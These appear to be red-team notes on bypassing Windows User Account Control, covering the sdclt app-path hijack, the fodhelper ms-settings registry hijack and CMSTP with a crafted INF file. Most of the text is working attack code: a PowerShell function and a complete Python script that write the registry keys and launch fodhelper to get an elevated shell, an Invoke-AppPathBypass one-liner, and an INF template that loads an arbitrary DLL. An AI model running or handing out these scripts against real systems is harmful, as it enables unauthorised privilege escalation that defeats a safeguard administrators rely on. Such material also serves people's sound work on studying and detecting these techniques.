Bypass UAC

Red Team, Windows

Prerequisite

  • A medium integrity process
  • A standard user in an administrators group
  • Windows executable must be signed by Microsoft code signingcertificate
  • Windows executable must be located in a secure directory
  • Windows executable also must specify the auto Elevateproperty in their manifest

SDCLT

  • SDCLT is a Microsoft binary that is used in Windows systems to allow the user to perform backup and restore operations.
  • It has autoElevated setting true
1
2
3
4
5
6
7
<application  xmlns="urn:schemas-microsoft-com:asm.v3">
    <windowsSettings>
        <dpiAware  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
        <autoElevate  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</autoElevate>
    </windowsSettings>
</application>
</assembly>

app path

  • The backup and restore operation is part of the control panel
  • when the program loads, it finds control.exe in app path
  • create control.exe value in registry
  • then run sdclt
  • administrator cmd prompt without uac prompt

  • all the process can be done by powershell script

    Invoke-AppPathBypass -payload "C:\Windows\system32\cmd.exe"

Manage Optional Features

  • manage optional feature
  • it has auto elevation
  • Registry file location
1
2
HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
  • create delegateexecute and default value
  • then execute fodhelper administrator popup wil come out
  • can also use with wsscript or python

WsCript

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
function FodhelperBypass(){ 
 
Param (    
 
 [String]$program = "cmd /c start powershell.exe" #default
 
      )
 
#Create registry structure
 
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
 
#Perform the bypass
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
 
#Remove registry structure
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
 
}

python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import os
import sys
import ctypes
import _winreg

CMD                   = r"C:\Windows\System32\cmd.exe"
FOD_HELPER            = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD            = "python"
REG_PATH              = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'

def is_running_as_admin():
    '''
    Checks if the script is running with administrative privileges.
    Returns True if is running as admin, False otherwise.
    '''    
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()

    except:
        return False

def create_reg_key(key, value):
    '''
    Creates a reg key
    '''
    try:        
        _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)        
        _winreg.CloseKey(registry_key)

    except WindowsError:        
        raise

def bypass_uac(cmd):
    '''
    Tries to bypass the UAC
    '''
    try:
        create_reg_key(DELEGATE_EXEC_REG_KEY, '')
        create_reg_key(None, cmd) 
          
    except WindowsError:
        raise

def execute():        
    if not is_running_as_admin():
        print '[!] The script is NOT running with administrative privileges'
        print '[+] Trying to bypass the UAC'

        try:                
            current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
            cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
            bypass_uac(cmd)                
            os.system(FOD_HELPER)               
            sys.exit(0)                

        except WindowsError:
            sys.exit(1)

    else:
        print '[+] The script is running with administrative privileges!'        

if __name__ == '__main__':
    execute()

CMSTP

  • a binary which is associated with the Microsoft Connection Manager Profile Installer
  • craft malicious inf file in order to use along with cmstp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[version]
Signature=$chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
 
[RegisterOCXSection]
C:\Users\kth\Downloads\test.dll
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Klab"
ShortSvcName="Klab"